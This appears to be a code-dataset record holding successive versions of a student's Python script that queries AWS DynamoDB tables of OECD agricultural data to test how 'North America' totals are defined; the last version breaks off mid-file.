na_scan_data.sort(key=data_sort)
can_scan_data.sort(key=data_sort)
usa_scan_data.sort(key=data_sort)
mex_scan_data.sort(key=data_sort)
# Analyze data
for year in YEAR_RANGE:
# For each relevant year, calculate total value using multiplication factor
i = year - 2010
na_value = na_scan_data[i]['value'] * (10**na_scan_data[i]['mfactor'])
can_value = can_scan_data[i]['value'] * (10**can_scan_data[i]['mfactor'])
usa_value = usa_scan_data[i]['value'] * (10**usa_scan_data[i]['mfactor'])
mex_value = mex_scan_data[i]['value'] * (10**mex_scan_data[i]['mfactor'])
# Calc temp sums for the CAN+USA and CAN+USA+MEX columns
temp_can_usa_value = can_value + usa_value
temp_can_usa_mex_value = can_value + usa_value + mex_value
# Determine OECD def of NA, by checking if the temp calc sums from scan data calc values are equivalent to CAN+USA sum, CAN+USA+MEX sum, or Neither
# Note: accumulate the #of accurate NA def 'hits'
if temp_can_usa_value == na_value:
na_defn = 'CAN+USA'
temp_can_usa += 1
elif temp_can_usa_mex_value == na_value:
na_defn = 'CAN+USA+MEX'
temp_can_usa_mex += 1
else:
na_defn = 'Neither'
temp_neither += 1
# Print table row for current year
print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value, mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))
# Determine the NA definition for this variable based on #of 'hits' per year
max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)
if temp_can_usa == max_hits:
na_defn = "CAN+USA"
elif temp_can_usa_mex == max_hits:
na_defn = "CAN+USA+MEX"
else:
na_defn = "Neither"
print(f"North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither")
print(f"Therefore we can conclude North America = {na_defn}\n")
# Accumulate global totals using temp local accumulators for NA definition 'hits'
total_can_usa += temp_can_usa
total_can_usa_mex += temp_can_usa_mex
total_neither += temp_neither
# Sorter Helper for queried data by year
def data_sort(elem):
return elem['year']
###################################################################################################
main()
|
flexible
|
{
"blob_id": "05186093820dffd047b0e7b5a69eb33f94f78b80",
"index": 6787,
"step-1": "<mask token>\n\n\ndef main():\n global dynamodb_client\n global dynamodb_resource\n global na_table\n global canada_table\n global usa_table\n global mexico_table\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n argc = len(sys.argv)\n bad_usage_flag = False\n if argc > 2:\n bad_usage_flag = True\n print('Error: Too many arguments.')\n if bad_usage_flag:\n sys.exit(USAGE_STATEMENT)\n dynamodb_client = boto3.client('dynamodb')\n dynamodb_resource = boto3.resource('dynamodb')\n try:\n dynamodb_client.list_tables()\n except Exception as e:\n print(\n \"Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')\"\n )\n sys.exit(f'[ERROR] {e}')\n err_output = ''\n table_list = dynamodb_client.list_tables()['TableNames']\n print(f'Existing Tables: {table_list}')\n for t in TABLE_LIST:\n if t not in table_list:\n err_output += (\n f\"Error: Invalid table name '{t}' - table does not exist.\\n\")\n if err_output != '':\n print(err_output.strip('\\n'))\n sys.exit(\n 'ERROR: Terminating program because unable to get table that does not exist.'\n )\n na_table = dynamodb_resource.Table(NORTH_AMERICA)\n canada_table = dynamodb_resource.Table(CANADA)\n usa_table = dynamodb_resource.Table(USA)\n mexico_table = dynamodb_resource.Table(MEXICO)\n commodity_encodings_dict = {}\n variable_encodings_dict = {}\n with open(ENCODINGS_CSV, 'r', newline='') as csv_file:\n csv_content = csv.reader(csv_file, delimiter=',')\n for row in csv_content:\n if row[2] == 'variable':\n variable_encodings_dict[row[0]] = row[1]\n elif row[2] == 'commodity':\n commodity_encodings_dict[row[0]] = row[1]\n csv_file.close()\n if argc == 2:\n commodity_input = sys.argv[1]\n else:\n commodity_input = input('Commodity: ').strip()\n if commodity_input.upper() in commodity_encodings_dict:\n commodity_code = commodity_input.upper()\n else:\n commodity_code = convert_dict_label_to_code_key(commodity_input,\n commodity_encodings_dict)\n print(f'ENCODING: {commodity_code}')\n if commodity_code is None:\n print(f\"Error: Commodity '{commodity_input}' was not found.\")\n sys.exit(\n 'ERROR: Terminating program because input does not exist as an encoding commodity code or label.'\n )\n total_can_usa = 0\n total_can_usa_mex = 0\n total_neither = 0\n for var in variable_encodings_dict.keys():\n if is_common_variable(commodity_code, var):\n output_table(commodity_code, var, variable_encodings_dict,\n commodity_encodings_dict)\n max_hits = max(total_can_usa, total_can_usa_mex, total_neither)\n if total_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif total_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither'\n )\n print(\n f'Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\\n'\n )\n\n\ndef convert_dict_label_to_code_key(label, encodings_dict):\n if label in list(encodings_dict.values()):\n return list(encodings_dict.keys())[list(encodings_dict.values()).\n index(label)]\n else:\n return None\n\n\n<mask token>\n\n\ndef has_commodity_and_variable(table, commodity_code, variable):\n response = table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))\n return response['Count'] > 0\n\n\ndef output_table(commodity_code, variable, variable_encodings_dict,\n commodity_encodings_dict):\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n temp_can_usa = 0\n temp_can_usa_mex = 0\n temp_neither = 0\n print(f'Variable: {variable_encodings_dict[variable]}')\n print(OUTPUT_FORMAT.format('Year', 'North America', 'Canada', 'USA',\n 'Mexico', 'CAN+USA', 'CAN+USA+MEX', 'NA Defn'))\n na_scan_data = na_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n can_scan_data = canada_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n usa_scan_data = usa_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n mex_scan_data = mexico_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n na_scan_data.sort(key=data_sort)\n can_scan_data.sort(key=data_sort)\n usa_scan_data.sort(key=data_sort)\n mex_scan_data.sort(key=data_sort)\n for year in YEAR_RANGE:\n i = year - 2010\n na_value = na_scan_data[i]['value'] * 10 ** na_scan_data[i]['mfactor']\n can_value = can_scan_data[i]['value'] * 10 ** can_scan_data[i][\n 'mfactor']\n usa_value = usa_scan_data[i]['value'] * 10 ** usa_scan_data[i][\n 'mfactor']\n mex_value = mex_scan_data[i]['value'] * 10 ** mex_scan_data[i][\n 'mfactor']\n temp_can_usa_value = can_value + usa_value\n temp_can_usa_mex_value = can_value + usa_value + mex_value\n if temp_can_usa_value == na_value:\n na_defn = 'CAN+USA'\n temp_can_usa += 1\n elif temp_can_usa_mex_value == na_value:\n na_defn = 'CAN+USA+MEX'\n temp_can_usa_mex += 1\n else:\n na_defn = 'Neither'\n temp_neither += 1\n print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value,\n mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))\n max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)\n if temp_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif temp_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither'\n )\n print(f'Therefore we can conclude North America = {na_defn}\\n')\n total_can_usa += temp_can_usa\n total_can_usa_mex += temp_can_usa_mex\n total_neither += temp_neither\n\n\ndef data_sort(elem):\n return elem['year']\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n global dynamodb_client\n global dynamodb_resource\n global na_table\n global canada_table\n global usa_table\n global mexico_table\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n argc = len(sys.argv)\n bad_usage_flag = False\n if argc > 2:\n bad_usage_flag = True\n print('Error: Too many arguments.')\n if bad_usage_flag:\n sys.exit(USAGE_STATEMENT)\n dynamodb_client = boto3.client('dynamodb')\n dynamodb_resource = boto3.resource('dynamodb')\n try:\n dynamodb_client.list_tables()\n except Exception as e:\n print(\n \"Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')\"\n )\n sys.exit(f'[ERROR] {e}')\n err_output = ''\n table_list = dynamodb_client.list_tables()['TableNames']\n print(f'Existing Tables: {table_list}')\n for t in TABLE_LIST:\n if t not in table_list:\n err_output += (\n f\"Error: Invalid table name '{t}' - table does not exist.\\n\")\n if err_output != '':\n print(err_output.strip('\\n'))\n sys.exit(\n 'ERROR: Terminating program because unable to get table that does not exist.'\n )\n na_table = dynamodb_resource.Table(NORTH_AMERICA)\n canada_table = dynamodb_resource.Table(CANADA)\n usa_table = dynamodb_resource.Table(USA)\n mexico_table = dynamodb_resource.Table(MEXICO)\n commodity_encodings_dict = {}\n variable_encodings_dict = {}\n with open(ENCODINGS_CSV, 'r', newline='') as csv_file:\n csv_content = csv.reader(csv_file, delimiter=',')\n for row in csv_content:\n if row[2] == 'variable':\n variable_encodings_dict[row[0]] = row[1]\n elif row[2] == 'commodity':\n commodity_encodings_dict[row[0]] = row[1]\n csv_file.close()\n if argc == 2:\n commodity_input = sys.argv[1]\n else:\n commodity_input = input('Commodity: ').strip()\n if commodity_input.upper() in commodity_encodings_dict:\n commodity_code = commodity_input.upper()\n else:\n commodity_code = convert_dict_label_to_code_key(commodity_input,\n commodity_encodings_dict)\n print(f'ENCODING: {commodity_code}')\n if commodity_code is None:\n print(f\"Error: Commodity '{commodity_input}' was not found.\")\n sys.exit(\n 'ERROR: Terminating program because input does not exist as an encoding commodity code or label.'\n )\n total_can_usa = 0\n total_can_usa_mex = 0\n total_neither = 0\n for var in variable_encodings_dict.keys():\n if is_common_variable(commodity_code, var):\n output_table(commodity_code, var, variable_encodings_dict,\n commodity_encodings_dict)\n max_hits = max(total_can_usa, total_can_usa_mex, total_neither)\n if total_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif total_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither'\n )\n print(\n f'Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\\n'\n )\n\n\ndef convert_dict_label_to_code_key(label, encodings_dict):\n if label in list(encodings_dict.values()):\n return list(encodings_dict.keys())[list(encodings_dict.values()).\n index(label)]\n else:\n return None\n\n\ndef is_common_variable(commodity_code, variable):\n return has_commodity_and_variable(na_table, commodity_code, variable\n ) and has_commodity_and_variable(canada_table, commodity_code, variable\n ) and has_commodity_and_variable(usa_table, commodity_code, variable\n ) and has_commodity_and_variable(mexico_table, commodity_code, variable\n )\n\n\ndef has_commodity_and_variable(table, commodity_code, variable):\n response = table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))\n return response['Count'] > 0\n\n\ndef output_table(commodity_code, variable, variable_encodings_dict,\n commodity_encodings_dict):\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n temp_can_usa = 0\n temp_can_usa_mex = 0\n temp_neither = 0\n print(f'Variable: {variable_encodings_dict[variable]}')\n print(OUTPUT_FORMAT.format('Year', 'North America', 'Canada', 'USA',\n 'Mexico', 'CAN+USA', 'CAN+USA+MEX', 'NA Defn'))\n na_scan_data = na_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n can_scan_data = canada_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n usa_scan_data = usa_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n mex_scan_data = mexico_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n na_scan_data.sort(key=data_sort)\n can_scan_data.sort(key=data_sort)\n usa_scan_data.sort(key=data_sort)\n mex_scan_data.sort(key=data_sort)\n for year in YEAR_RANGE:\n i = year - 2010\n na_value = na_scan_data[i]['value'] * 10 ** na_scan_data[i]['mfactor']\n can_value = can_scan_data[i]['value'] * 10 ** can_scan_data[i][\n 'mfactor']\n usa_value = usa_scan_data[i]['value'] * 10 ** usa_scan_data[i][\n 'mfactor']\n mex_value = mex_scan_data[i]['value'] * 10 ** mex_scan_data[i][\n 'mfactor']\n temp_can_usa_value = can_value + usa_value\n temp_can_usa_mex_value = can_value + usa_value + mex_value\n if temp_can_usa_value == na_value:\n na_defn = 'CAN+USA'\n temp_can_usa += 1\n elif temp_can_usa_mex_value == na_value:\n na_defn = 'CAN+USA+MEX'\n temp_can_usa_mex += 1\n else:\n na_defn = 'Neither'\n temp_neither += 1\n print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value,\n mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))\n max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)\n if temp_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif temp_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither'\n )\n print(f'Therefore we can conclude North America = {na_defn}\\n')\n total_can_usa += temp_can_usa\n total_can_usa_mex += temp_can_usa_mex\n total_neither += temp_neither\n\n\ndef data_sort(elem):\n return elem['year']\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n global dynamodb_client\n global dynamodb_resource\n global na_table\n global canada_table\n global usa_table\n global mexico_table\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n argc = len(sys.argv)\n bad_usage_flag = False\n if argc > 2:\n bad_usage_flag = True\n print('Error: Too many arguments.')\n if bad_usage_flag:\n sys.exit(USAGE_STATEMENT)\n dynamodb_client = boto3.client('dynamodb')\n dynamodb_resource = boto3.resource('dynamodb')\n try:\n dynamodb_client.list_tables()\n except Exception as e:\n print(\n \"Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')\"\n )\n sys.exit(f'[ERROR] {e}')\n err_output = ''\n table_list = dynamodb_client.list_tables()['TableNames']\n print(f'Existing Tables: {table_list}')\n for t in TABLE_LIST:\n if t not in table_list:\n err_output += (\n f\"Error: Invalid table name '{t}' - table does not exist.\\n\")\n if err_output != '':\n print(err_output.strip('\\n'))\n sys.exit(\n 'ERROR: Terminating program because unable to get table that does not exist.'\n )\n na_table = dynamodb_resource.Table(NORTH_AMERICA)\n canada_table = dynamodb_resource.Table(CANADA)\n usa_table = dynamodb_resource.Table(USA)\n mexico_table = dynamodb_resource.Table(MEXICO)\n commodity_encodings_dict = {}\n variable_encodings_dict = {}\n with open(ENCODINGS_CSV, 'r', newline='') as csv_file:\n csv_content = csv.reader(csv_file, delimiter=',')\n for row in csv_content:\n if row[2] == 'variable':\n variable_encodings_dict[row[0]] = row[1]\n elif row[2] == 'commodity':\n commodity_encodings_dict[row[0]] = row[1]\n csv_file.close()\n if argc == 2:\n commodity_input = sys.argv[1]\n else:\n commodity_input = input('Commodity: ').strip()\n if commodity_input.upper() in commodity_encodings_dict:\n commodity_code = commodity_input.upper()\n else:\n commodity_code = convert_dict_label_to_code_key(commodity_input,\n commodity_encodings_dict)\n print(f'ENCODING: {commodity_code}')\n if commodity_code is None:\n print(f\"Error: Commodity '{commodity_input}' was not found.\")\n sys.exit(\n 'ERROR: Terminating program because input does not exist as an encoding commodity code or label.'\n )\n total_can_usa = 0\n total_can_usa_mex = 0\n total_neither = 0\n for var in variable_encodings_dict.keys():\n if is_common_variable(commodity_code, var):\n output_table(commodity_code, var, variable_encodings_dict,\n commodity_encodings_dict)\n max_hits = max(total_can_usa, total_can_usa_mex, total_neither)\n if total_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif total_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither'\n )\n print(\n f'Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\\n'\n )\n\n\ndef convert_dict_label_to_code_key(label, encodings_dict):\n if label in list(encodings_dict.values()):\n return list(encodings_dict.keys())[list(encodings_dict.values()).\n index(label)]\n else:\n return None\n\n\ndef is_common_variable(commodity_code, variable):\n return has_commodity_and_variable(na_table, commodity_code, variable\n ) and has_commodity_and_variable(canada_table, commodity_code, variable\n ) and has_commodity_and_variable(usa_table, commodity_code, variable\n ) and has_commodity_and_variable(mexico_table, commodity_code, variable\n )\n\n\ndef has_commodity_and_variable(table, commodity_code, variable):\n response = table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))\n return response['Count'] > 0\n\n\ndef output_table(commodity_code, variable, variable_encodings_dict,\n commodity_encodings_dict):\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n temp_can_usa = 0\n temp_can_usa_mex = 0\n temp_neither = 0\n print(f'Variable: {variable_encodings_dict[variable]}')\n print(OUTPUT_FORMAT.format('Year', 'North America', 'Canada', 'USA',\n 'Mexico', 'CAN+USA', 'CAN+USA+MEX', 'NA Defn'))\n na_scan_data = na_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n can_scan_data = canada_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n usa_scan_data = usa_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n mex_scan_data = mexico_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n na_scan_data.sort(key=data_sort)\n can_scan_data.sort(key=data_sort)\n usa_scan_data.sort(key=data_sort)\n mex_scan_data.sort(key=data_sort)\n for year in YEAR_RANGE:\n i = year - 2010\n na_value = na_scan_data[i]['value'] * 10 ** na_scan_data[i]['mfactor']\n can_value = can_scan_data[i]['value'] * 10 ** can_scan_data[i][\n 'mfactor']\n usa_value = usa_scan_data[i]['value'] * 10 ** usa_scan_data[i][\n 'mfactor']\n mex_value = mex_scan_data[i]['value'] * 10 ** mex_scan_data[i][\n 'mfactor']\n temp_can_usa_value = can_value + usa_value\n temp_can_usa_mex_value = can_value + usa_value + mex_value\n if temp_can_usa_value == na_value:\n na_defn = 'CAN+USA'\n temp_can_usa += 1\n elif temp_can_usa_mex_value == na_value:\n na_defn = 'CAN+USA+MEX'\n temp_can_usa_mex += 1\n else:\n na_defn = 'Neither'\n temp_neither += 1\n print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value,\n mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))\n max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)\n if temp_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif temp_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither'\n )\n print(f'Therefore we can conclude North America = {na_defn}\\n')\n total_can_usa += temp_can_usa\n total_can_usa_mex += temp_can_usa_mex\n total_neither += temp_neither\n\n\ndef data_sort(elem):\n return elem['year']\n\n\nmain()\n",
"step-4": "<mask token>\nimport boto3\nimport csv\nimport sys\nfrom boto3.dynamodb.conditions import Key, Attr\nNORTH_AMERICA = 'northamerica'\nCANADA = 'canada'\nUSA = 'usa'\nMEXICO = 'mexico'\nTABLE_LIST = [NORTH_AMERICA, CANADA, USA, MEXICO]\nYEAR_RANGE = range(2010, 2030)\nOUTPUT_FORMAT = '{:<8}{:<18}{:<18}{:<18}{:<18}{:<18}{:<18}{:<10}'\nENCODINGS_CSV = 'encodings.csv'\nUSAGE_STATEMENT = 'Usage: py queryOECD.py <commodity-code|commodity-label>'\n\n\ndef main():\n global dynamodb_client\n global dynamodb_resource\n global na_table\n global canada_table\n global usa_table\n global mexico_table\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n argc = len(sys.argv)\n bad_usage_flag = False\n if argc > 2:\n bad_usage_flag = True\n print('Error: Too many arguments.')\n if bad_usage_flag:\n sys.exit(USAGE_STATEMENT)\n dynamodb_client = boto3.client('dynamodb')\n dynamodb_resource = boto3.resource('dynamodb')\n try:\n dynamodb_client.list_tables()\n except Exception as e:\n print(\n \"Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')\"\n )\n sys.exit(f'[ERROR] {e}')\n err_output = ''\n table_list = dynamodb_client.list_tables()['TableNames']\n print(f'Existing Tables: {table_list}')\n for t in TABLE_LIST:\n if t not in table_list:\n err_output += (\n f\"Error: Invalid table name '{t}' - table does not exist.\\n\")\n if err_output != '':\n print(err_output.strip('\\n'))\n sys.exit(\n 'ERROR: Terminating program because unable to get table that does not exist.'\n )\n na_table = dynamodb_resource.Table(NORTH_AMERICA)\n canada_table = dynamodb_resource.Table(CANADA)\n usa_table = dynamodb_resource.Table(USA)\n mexico_table = dynamodb_resource.Table(MEXICO)\n commodity_encodings_dict = {}\n variable_encodings_dict = {}\n with open(ENCODINGS_CSV, 'r', newline='') as csv_file:\n csv_content = csv.reader(csv_file, delimiter=',')\n for row in csv_content:\n if row[2] == 'variable':\n variable_encodings_dict[row[0]] = row[1]\n elif row[2] == 'commodity':\n commodity_encodings_dict[row[0]] = row[1]\n csv_file.close()\n if argc == 2:\n commodity_input = sys.argv[1]\n else:\n commodity_input = input('Commodity: ').strip()\n if commodity_input.upper() in commodity_encodings_dict:\n commodity_code = commodity_input.upper()\n else:\n commodity_code = convert_dict_label_to_code_key(commodity_input,\n commodity_encodings_dict)\n print(f'ENCODING: {commodity_code}')\n if commodity_code is None:\n print(f\"Error: Commodity '{commodity_input}' was not found.\")\n sys.exit(\n 'ERROR: Terminating program because input does not exist as an encoding commodity code or label.'\n )\n total_can_usa = 0\n total_can_usa_mex = 0\n total_neither = 0\n for var in variable_encodings_dict.keys():\n if is_common_variable(commodity_code, var):\n output_table(commodity_code, var, variable_encodings_dict,\n commodity_encodings_dict)\n max_hits = max(total_can_usa, total_can_usa_mex, total_neither)\n if total_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif total_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'Overall North America Definition Results: {total_can_usa} CAN+USA, {total_can_usa_mex} CAN+USA+MEX, {total_neither} Neither'\n )\n print(\n f'Conclusion for all {commodity_encodings_dict[commodity_code]} variables = {na_defn}\\n'\n )\n\n\ndef convert_dict_label_to_code_key(label, encodings_dict):\n if label in list(encodings_dict.values()):\n return list(encodings_dict.keys())[list(encodings_dict.values()).\n index(label)]\n else:\n return None\n\n\ndef is_common_variable(commodity_code, variable):\n return has_commodity_and_variable(na_table, commodity_code, variable\n ) and has_commodity_and_variable(canada_table, commodity_code, variable\n ) and has_commodity_and_variable(usa_table, commodity_code, variable\n ) and has_commodity_and_variable(mexico_table, commodity_code, variable\n )\n\n\ndef has_commodity_and_variable(table, commodity_code, variable):\n response = table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))\n return response['Count'] > 0\n\n\ndef output_table(commodity_code, variable, variable_encodings_dict,\n commodity_encodings_dict):\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n temp_can_usa = 0\n temp_can_usa_mex = 0\n temp_neither = 0\n print(f'Variable: {variable_encodings_dict[variable]}')\n print(OUTPUT_FORMAT.format('Year', 'North America', 'Canada', 'USA',\n 'Mexico', 'CAN+USA', 'CAN+USA+MEX', 'NA Defn'))\n na_scan_data = na_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n can_scan_data = canada_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n usa_scan_data = usa_table.scan(FilterExpression=Attr('commodity').eq(\n commodity_code) & Attr('variable').eq(variable))['Items']\n mex_scan_data = mexico_table.scan(FilterExpression=Attr('commodity').eq\n (commodity_code) & Attr('variable').eq(variable))['Items']\n na_scan_data.sort(key=data_sort)\n can_scan_data.sort(key=data_sort)\n usa_scan_data.sort(key=data_sort)\n mex_scan_data.sort(key=data_sort)\n for year in YEAR_RANGE:\n i = year - 2010\n na_value = na_scan_data[i]['value'] * 10 ** na_scan_data[i]['mfactor']\n can_value = can_scan_data[i]['value'] * 10 ** can_scan_data[i][\n 'mfactor']\n usa_value = usa_scan_data[i]['value'] * 10 ** usa_scan_data[i][\n 'mfactor']\n mex_value = mex_scan_data[i]['value'] * 10 ** mex_scan_data[i][\n 'mfactor']\n temp_can_usa_value = can_value + usa_value\n temp_can_usa_mex_value = can_value + usa_value + mex_value\n if temp_can_usa_value == na_value:\n na_defn = 'CAN+USA'\n temp_can_usa += 1\n elif temp_can_usa_mex_value == na_value:\n na_defn = 'CAN+USA+MEX'\n temp_can_usa_mex += 1\n else:\n na_defn = 'Neither'\n temp_neither += 1\n print(OUTPUT_FORMAT.format(year, na_value, can_value, usa_value,\n mex_value, temp_can_usa_value, temp_can_usa_mex_value, na_defn))\n max_hits = max(temp_can_usa, temp_can_usa_mex, temp_neither)\n if temp_can_usa == max_hits:\n na_defn = 'CAN+USA'\n elif temp_can_usa_mex == max_hits:\n na_defn = 'CAN+USA+MEX'\n else:\n na_defn = 'Neither'\n print(\n f'North America Definition Results: {temp_can_usa} CAN+USA, {temp_can_usa_mex} CAN+USA+MEX, {temp_neither} Neither'\n )\n print(f'Therefore we can conclude North America = {na_defn}\\n')\n total_can_usa += temp_can_usa\n total_can_usa_mex += temp_can_usa_mex\n total_neither += temp_neither\n\n\ndef data_sort(elem):\n return elem['year']\n\n\nmain()\n",
"step-5": "#!/usr/bin/env python\n\n'''\n@author : Mitchell Van Braeckel\n@id : 1002297\n@date : 10/10/2020\n@version : python 3.8-32 / python 3.8.5\n@course : CIS*4010 Cloud Computing\n@brief : A1 Part 2 - AWS DynamoDB ; Q2 - Query OECD\n\n@note :\n Description: There are many CSV files containing info from the OECD about agricultural production, each for various regions around the world.\n Queries all 4 tables (northamerica, canada, usa, mexico -table names) based on a commodity (code key or label),\n looking for all common variables between CAN, USA, and MEX, outputting all results (for all years) in a table,\n then output the specific NA definition 'hit' results and probable conclusion for NA definition per variable,\n as well as an overall conclusion for NA definition\n\n NOTE: forgot to add ability to specify commodity as cmd line arg instead of STDIN\n\n NOTE: assume year range is 2010 to 2029 (inclusive)\n NOTE: assume perfect user input for commodity and variables\n - however, if input commodity that's not a valid commodity code or label, exits program with error message\n NOTE: NA definition hit refers to if the calculated sum from different tables of CAN, USA, MEX are equal to that of NA (CAN+USA, CAN+USA+MEX, or Neither)\n'''\n\n'''\n IMPROVEMENT: Use 'encodings' table instead of the CSV file\n'''\n\n############################################# IMPORTS #############################################\n\n# IMPORTS - 'pip install <import-package>'\nimport boto3\nimport csv\nimport sys\nfrom boto3.dynamodb.conditions import Key, Attr\n\n############################################ CONSTANTS ############################################\n\n# TABLE CONSTANTS\nNORTH_AMERICA = \"northamerica\"\nCANADA = \"canada\"\nUSA = \"usa\"\nMEXICO = \"mexico\"\nTABLE_LIST = [NORTH_AMERICA, CANADA, USA, MEXICO]\nYEAR_RANGE = range(2010, 2030)\n\n# OTHER CONSTANTS\nOUTPUT_FORMAT = \"{:<8}{:<18}{:<18}{:<18}{:<18}{:<18}{:<18}{:<10}\"\nENCODINGS_CSV = \"encodings.csv\"\n#ENCODINGS_TABLE_NAME = \"encodings\"\nUSAGE_STATEMENT = \"Usage: py queryOECD.py <commodity-code|commodity-label>\"\n\n############################## STATE VARIABLES, INITIALIZATION, MAIN ##############################\n\n# MAIN - Declares global vars and state here, then ask for commodity (check both key/label),\n# look for all common variables between CAN, USA, and MEX, outputting all results (for all years) in a table,\n# then output the specific NA definition 'hit' results and probable conclusion for NA definition\ndef main():\n #globals\n global dynamodb_client\n global dynamodb_resource\n global na_table\n global canada_table\n global usa_table\n global mexico_table\n global total_can_usa\n global total_can_usa_mex\n global total_neither\n\n # ========== ARGUMENTS ==========\n\n # Collect command line arguments when executing this python script\n argc = len(sys.argv)\n bad_usage_flag = False\n \n # Check #of args (deal with it later tho)\n # 1 optional arg for commodity, otherwise prompt user for it\n if argc > 2:\n bad_usage_flag = True\n print(\"Error: Too many arguments.\")\n \n # Exit with usage statement if flag has been triggered for any reason\n if bad_usage_flag:\n sys.exit(USAGE_STATEMENT)\n\n # ========== AWS DYNAMO DB ==========\n\n # Init AWS DynamoDB client and resource (NOTE: these are global)\n dynamodb_client = boto3.client(\"dynamodb\")\n dynamodb_resource = boto3.resource(\"dynamodb\")\n\n # Validate AWS DynamoDB credentials (by testing if 'list_tables()' works)\n try:\n dynamodb_client.list_tables()\n except Exception as e:\n print(\"Error: Invalid or expired credentials (or insufficient permissions to call 'list_tables()')\")\n sys.exit(f\"[ERROR] {e}\")\n\n # Check the 4 tables exist, then get them all\n err_output = \"\"\n table_list = dynamodb_client.list_tables()['TableNames']\n\n print(f\"Existing Tables: {table_list}\")\n\n for t in TABLE_LIST:\n if t not in table_list:\n err_output += f\"Error: Invalid table name '{t}' - table does not exist.\\n\"\n \n # Print all tables that did not exist, then exit\n if err_output != \"\":\n print(err_output.strip(\"\\n\"))\n sys.exit(\"ERROR: Terminating program because unable to get table that does not exist.\")\n\n # Get all tables (after checking they exist) (NOTE: these are global)\n na_table = dynamodb_resource.Table(NORTH_AMERICA)\n canada_table = 